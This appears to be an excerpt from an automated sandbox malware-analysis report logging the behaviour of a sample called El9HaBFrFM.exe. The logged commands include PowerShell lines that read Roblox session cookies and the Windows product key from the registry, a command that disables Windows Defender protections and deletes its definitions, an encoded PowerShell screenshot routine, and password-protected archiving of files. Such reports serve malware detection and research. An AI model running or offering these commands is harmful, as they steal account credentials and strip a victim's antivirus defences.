              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe a -r -hp"dave123" "C:\Users\user\AppData\Local\Temp\BfsYI.zip" *
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"Jump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiaJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7F1B340 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,83_2_00007FF6D7F1B340
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 0_2_00007FF6BA3C9570 cpuid 0_2_00007FF6BA3C9570
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\_ctypes.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformationJump to behavior
